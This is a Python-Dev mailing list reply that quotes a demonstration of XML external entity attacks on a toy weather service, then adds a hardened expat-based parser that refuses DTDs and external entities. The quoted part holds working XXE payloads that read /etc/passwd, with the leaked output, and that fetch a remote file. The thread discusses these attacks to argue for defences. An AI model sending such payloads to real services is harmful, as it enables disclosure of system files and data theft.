Re: [Python-Dev] XML DoS vulnerabilities and exploits in Python

24 Feb 2013 03:58:36 -0800

Reminds me of the encoding attacks that were possible in earlier
versions of Python... you could have e.g. an email processing
script run the Python test suite by simply sending a specially
crafted email :-)
On 21.02.2013 13:04, Christian Heimes wrote:
> Am 21.02.2013 11:32, schrieb Antoine Pitrou:
>> You haven't proved that these were actual threats, nor how they
>> actually worked. I'm gonna remain skeptical if there isn't anything
>> more precise than "It highly depends on the parser and the application
>> what kind of exploit is possible".
> 
> https://bitbucket.org/tiran/defusedxml/src/82f4037464418bf11ea734969b7ca1c193e6ed91/other/python-external.py?at=default
> 
> $ ./python-external.py
> 
> REQUEST:
> --------
> <weather>Aachen</weather>
> 
> RESPONSE:
> ---------
> <weather>The weather in Aachen is terrible.</weather
> 
> 
> REQUEST:
> --------
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE weather [
> <!ENTITY passwd SYSTEM "file:///etc/passwd">
> ]>
> <weather>&passwd;</weather>
> 
> 
> RESPONSE:
> ---------
> <error>Unknown city root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/bin/sh
> bin:x:2:2:bin:/bin:/bin/sh
> sys:x:3:3:sys:/dev:/bin/sh
> sync:x:4:65534:sync:/bin:/bin/sync
> games:x:5:60:games:/usr/games:/bin/sh
> man:x:6:12:man:/var/cache/man:/bin/sh
> lp:x:7:7:lp:/var/spool/lpd:/bin/sh
> mail:x:8:8:mail:/var/mail:/bin/sh
> news:x:9:9:news:/var/spool/news:/bin/sh
> uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
> proxy:x:13:13:proxy:/bin:/bin/sh
> www-data:x:33:33:www-data:/var/www:/bin/sh
> backup:x:34:34:backup:/var/backups:/bi</error>
> 
> 
> REQUEST:
> --------
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE weather [
> <!ENTITY url SYSTEM
> "http://hg.python.org/cpython/raw-file/a11ddd687a0b/Lib/test/dh512.pem">
> ]>
> <weather>&url;</weather>
> 
> 
> RESPONSE:
> ---------
> <error>Unknown city -----BEGIN DH PARAMETERS-----
> MEYCQQD1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zafq9AKUJsCRtMIPWak
> XUGfnHy9iUsiGSa6q6Jew1XpKgVfAgEC
> -----END DH PARAMETERS-----
> 
> These are the 512 bit DH parameters from "Assigned Number for SKIP
> Protocols"
> (http://www.skip-vpn.org/spec/numbers.html).
> See there for how they were generated.
> Note that g is not a generator, but this is not a problem since p is a
> safe prime.
> </error>
> 
> 
> Q.E.D.
> Christian
> _______________________________________________
> Python-Dev mailing list
> [email protected]
> http://mail.python.org/mailman/listinfo/python-dev
> Unsubscribe: 
> http://mail.python.org/mailman/options/python-dev/mal%40egenix.com
> 
-- 
Marc-Andre Lemburg
eGenix.com
Professional Python Services directly from the Source (#1, Feb 24 2013)
>>> Python Projects, Consulting and Support ... http://www.egenix.com/
>>> mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/
>>> mxODBC, mxDateTime, mxTextTools ... http://python.egenix.com/
________________________________________________________________________
::::: Try our mxODBC.Connect Python Database Interface for free ! ::::::
 eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48
 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
 Registered at Amtsgericht Duesseldorf: HRB 46611
 http://www.egenix.com/company/contact/
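The demonstration quoted above leaks /etc/passwd because the parser resolves the external general entity and the service then echoes the unknown "city" back in its error element. The block below is an added example written for this archive page; it is not Christian Heimes' python-external.py and not part of defusedxml. It rebuilds the weather lookup on top of the stdlib xml.parsers.expat module with the two mitigations a reviewer would ask for: the parser refuses any DOCTYPE or entity declaration and never follows external entity references, and the error response no longer reflects request content. The request documents, the `parse_city`/`handle_request` names and the one-city weather table are constructed for the example.

```python
"""Hardened parsing of the <weather> request shown in the thread.

Added example, not the thread author's code. Uses only xml.parsers.expat
from the standard library so it runs offline; nothing here opens a URL.
"""
import xml.parsers.expat as expat
from xml.sax.saxutils import escape

# Constructed requests mirroring the first two requests quoted in the thread.
BENIGN_REQUEST = b"<weather>Aachen</weather>"
XXE_REQUEST = (
    b'<?xml version="1.0" encoding="utf-8"?>\n'
    b"<!DOCTYPE weather [\n"
    b'<!ENTITY passwd SYSTEM "file:///etc/passwd">\n'
    b"]>\n"
    b"<weather>&passwd;</weather>"
)

# Constructed lookup table standing in for the real weather backend.
WEATHER = {"Aachen": "terrible"}


class ForbiddenXML(Exception):
    """Raised for XML features a weather lookup never needs."""


def parse_city(data):
    """Return the text of <weather>CITY</weather>, or raise ForbiddenXML."""
    parser = expat.ParserCreate()
    chunks = []
    state = {"depth": 0}

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        # Fires before any entity declaration inside the DTD is seen.
        raise ForbiddenXML("DOCTYPE declarations are not accepted")

    def forbid_entity(name, is_param, value, base, sysid, pubid, notation):
        raise ForbiddenXML("entity declaration %r is not accepted" % name)

    def refuse_external(context, base, sysid, pubid):
        # Returning 0 makes expat stop with an error instead of resolving
        # the reference; nothing is fetched from disk or the network.
        return 0

    def start(name, attrs):
        state["depth"] += 1
        if state["depth"] == 1 and name != "weather":
            raise ForbiddenXML("unexpected root element %r" % name)

    def end(name):
        state["depth"] -= 1

    def chardata(text):
        if state["depth"] == 1:  # text directly under <weather>
            chunks.append(text)

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.ExternalEntityRefHandler = refuse_external
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chardata
    # Exceptions raised inside the handlers propagate out of Parse().
    parser.Parse(data, True)
    return "".join(chunks).strip()


def handle_request(data):
    """Produce the service response without reflecting request content."""
    try:
        city = parse_city(data)
    except (ForbiddenXML, expat.ExpatError) as exc:
        return "<error>Request rejected: %s</error>" % escape(str(exc))
    if city not in WEATHER:
        # The thread's service echoed the unknown city here; that echo is
        # what turned entity expansion into a file disclosure.
        return "<error>Unknown city</error>"
    return "<weather>The weather in %s is %s.</weather>" % (
        escape(city), WEATHER[city])


if __name__ == "__main__":
    for request in (BENIGN_REQUEST, XXE_REQUEST):
        print(handle_request(request))
```

Refusing the DTD outright is the simplest rule for a service whose schema never uses one; applications that must accept internal DTDs can keep `forbid_doctype` out and rely on `forbid_entity` plus `refuse_external`. Later Python releases also stopped xml.sax from processing general external entities by default, but an explicit policy in the application does not depend on the interpreter version it happens to run on.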